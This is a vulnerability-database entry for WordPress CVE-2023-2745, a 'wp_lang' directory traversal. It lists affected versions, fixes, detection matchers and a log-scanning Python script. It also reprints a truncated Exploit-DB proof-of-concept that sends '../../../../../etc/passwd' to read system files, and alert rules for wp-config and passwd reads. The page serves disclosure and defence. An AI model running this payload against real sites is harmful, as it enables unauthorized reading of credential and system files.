CVE-2023-2745
Published 2023-05-17
Priority: P182 · medium · CVSS 3.1: 6.1
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 79.53% (99.6th percentile)
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
Affected
49 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < wordpress 6.1.6+dfsg1-0+deb12u1 (bookworm) | wordpress 6.1.6+dfsg1-0+deb12u1 (bookworm) |
| wordpress | wordpress | < 4.1.38 | 4.1.38 |
| wordpress | wordpress | — | — |
| wordpress | wordpress | >= 0 < 5.7.11+dfsg1-0+deb11u1 | 5.7.11+dfsg1-0+deb11u1 |
| wordpress | wordpress | >= 0 < 6.1.6+dfsg1-0+deb12u1 | 6.1.6+dfsg1-0+deb12u1 |
| wordpress | wordpress | >= 0 < 6.2.1+dfsg1-1 | 6.2.1+dfsg1-1 |
| wordpress | wordpress | >= 0 < 6.2.1+dfsg1-1 | 6.2.1+dfsg1-1 |
| wordpress | wordpress | >= 4.2 < 4.2.35 | 4.2.35 |
| wordpress | wordpress | >= 4.3 < 4.3.31 | 4.3.31 |
| wordpress | wordpress | >= 4.4 < 4.4.30 | 4.4.30 |
| wordpress | wordpress | >= 4.5 < 4.5.29 | 4.5.29 |
| wordpress | wordpress | >= 4.6 < 4.6.26 | 4.6.26 |
| wordpress | wordpress | >= 4.7 < 4.7.26 | 4.7.26 |
| wordpress | wordpress | >= 4.8 < 4.8.22 | 4.8.22 |
| wordpress | wordpress | >= 4.9 < 4.9.23 | 4.9.23 |
| wordpress | wordpress | >= 5.0 < 5.0.19 | 5.0.19 |
| wordpress | wordpress | >= 5.1 < 5.1.16 | 5.1.16 |
| wordpress | wordpress | >= 5.2 < 5.2.18 | 5.2.18 |
| wordpress | wordpress | >= 5.3 < 5.3.15 | 5.3.15 |
| wordpress | wordpress | >= 5.4 < 5.4.13 | 5.4.13 |
| wordpress | wordpress | >= 5.5 < 5.5.12 | 5.5.12 |
| wordpress | wordpress | >= 5.6 < 5.6.11 | 5.6.11 |
| wordpress | wordpress | >= 5.7 < 5.7.9 | 5.7.9 |
| wordpress | wordpress | >= 5.8 < 5.8.7 | 5.8.7 |
| wordpress | wordpress | >= 5.9 < 5.9.6 | 5.9.6 |
Detection & IOCs
sigma
id: CVE-2023-2745
flow: http(1) && http(2)
matchers:
  - contains(body, "/wp-content/plugins")
  - contains_all(body_2, "DB_NAME", "DB_PASSWORD")
  - status_code_2 == 200
- Alert on responses to /wp-login.php?wp_lang=<traversal> that contain sensitive strings such as 'DB_NAME' or 'DB_PASSWORD', indicating successful wp-config.php exfiltration.
- Alert on responses containing 'root:x:0:0:root' following a request with a traversal payload in wp_lang, indicating successful /etc/passwd read.
- Flag upload of crafted .po/.mo translation files to the WordPress site, which could be chained with this traversal to achieve stored XSS.
- The Nuclei template requires a valid WordPress login (username/password) for the second HTTP step (POST to /wp-login.php) before issuing the traversal request; unauthenticated-only detection will miss the authenticated variant.
- The traversal depth required may vary by server configuration; the exploit PoC uses five levels (../../../../../) while the Nuclei template uses seven (../../../../../../../), so tune detection patterns accordingly.
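A depth-independent request-side check for the notes above, as an added example (not code from this page or from any of the cited sources). It assumes combined-format access logs and that legitimate wp_lang values look like locale codes; the sample lines, the function names and the locale pattern are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format assumed); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [17/May/2023:10:00:01 +0000] "GET /wp-login.php?wp_lang=de_DE HTTP/1.1" 200 5120
203.0.113.9 - - [17/May/2023:10:00:07 +0000] "GET /wp-login.php?wp_lang=../../../../../etc/passwd HTTP/1.1" 200 4890
203.0.113.9 - - [17/May/2023:10:00:09 +0000] "GET /wp-login.php?wp_lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 4890
203.0.113.7 - - [17/May/2023:10:00:20 +0000] "GET /wp-login.php?wp_lang=uploads/custom HTTP/1.1" 200 4890
198.51.100.2 - - [17/May/2023:10:01:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")  # one "../" or "..\" step, any count
# Assumption: legitimate wp_lang values look like de_DE, pt_BR, de_DE_formal.
LOCALE_RE = re.compile(r"^[A-Za-z]{2,3}(?:_[A-Za-z0-9]+)*$")

def normalise(value, max_rounds=3):
    """Percent-decode until stable so encoded separators cannot hide a match."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(wp_lang):
    """Return (verdict, depth); verdict is None for a plain locale code."""
    value = normalise(wp_lang)
    depth = len(TRAVERSAL_RE.findall(value))
    if depth:
        return "traversal", depth
    if not LOCALE_RE.match(value):
        return "non-locale", 0
    return None, 0

def scan(log_text):
    """Return (client, verdict, depth, decoded_value) for suspicious wp_lang values."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for raw in params.get("wp_lang", []):
            verdict, depth = classify(raw)
            if verdict:
                findings.append((client, verdict, depth, normalise(raw)))
    return findings
```

Access logs only cover the query string; a wp_lang value sent in a POST body needs the same check applied at a WAF or reverse proxy that sees request bodies.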
CVSS provenance
nvd · v3.1 · 6.1 MEDIUM · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv · 6.1 MEDIUM
vulncheck · 6.1 MEDIUM
vendor_debian · 5.4 MEDIUM
GHSA
GHSA-xgqr-2mpj-w9qv: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
ghsa_unreviewed·2023-07-06
CVE-2023-2745 [MEDIUM] CWE-22 GHSA-xgqr-2mpj-w9qv: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
OSV
CVE-2023-2745: WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6
osv·2023-05-17·CVSS 6.1
VulnCheck
WordPress wordpress Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2023·CVSS 6.1
Affected: WordPress wordpress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://patchstack.com/database/wordpress/wordpress/wordpress/vulnerability/wordpress-core-6-2-unau
Debian
CVE-2023-2745: wordpress - WordPress Core is vulnerable to Directory Traversal in versions up to, and inclu...
vendor_debian·2023·CVSS 5.4
Scope: local
bookworm: resolved (fixed in 6.1.6+dfsg1-0+deb12u1)
bullseye: resolved (fixed in 5.7.11+dfsg1-0+deb11u1)
forky: resolved (fixed in 6.2.1+dfsg1-1)
sid: resolved (fixed in 6.2.1+dfsg1-1)
trixie: resolved (fixed in 6.2.1+dfsg1-1)
No detection rules found.
Exploit-DB
WordPress Core 6.2 - Directory Traversal
exploitdb·2025-04-22·CVSS 5.4
---
# Exploit Title: WordPress Core 6.2 - Directory Traversal
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 6.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-2745
import requests
from colorama import init, Fore, Style

init(autoreset=True)

url = input("E.G https://example.com/wp-login.php : ")
payload = '../../../../../etc/passwd'
response = requests.get(url, params={'wp_lang': payload})

if response.status_code == 200:
    # Marker string from the first line of /etc/passwd
    if "root:x:0:0:root" in response.text:
        print(Fore.GREEN + 'Exploit successful, accessed content:')
        print(Fore.GREEN + response.text)
    else:
        print(Fore.YELLOW + 'Accessed content, but the expected file was not found:')
        # (the listing is cut off at this point in the source)
Nuclei
WordPress Core <=6.2 - Directory Traversal
nuclei·CVSS 6.1
Template:
id: CVE-2023-2745

info:
  name: WordPress Core <=6.2 - Directory Traversal
  author: nqdung2002
  severity: medium
  description: |
    WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting at
https://core.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=55765%40%2F&new=55765%40%2F&sfp_email=&sfph_mail=
https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
https://www.wordfence.com/blog/2023/05/wordpress-core-6-2-1-security-maintenance-release-what-you-need-to-know/
https://www.wordfence.com/threat-intel/vulnerabilities/id/edcf46b6-368e-49c0-b2c3-99bf6e2d358f?source=cve
http://packetstormsecurity.com/files/172426/WordPress-Core-6.2-XSS-CSRF-Directory-Traversal.html
https://lists.debian.org/debian-lts-announce/2023/06/msg00024.html
https://www.exploit-db.com/exploits/52274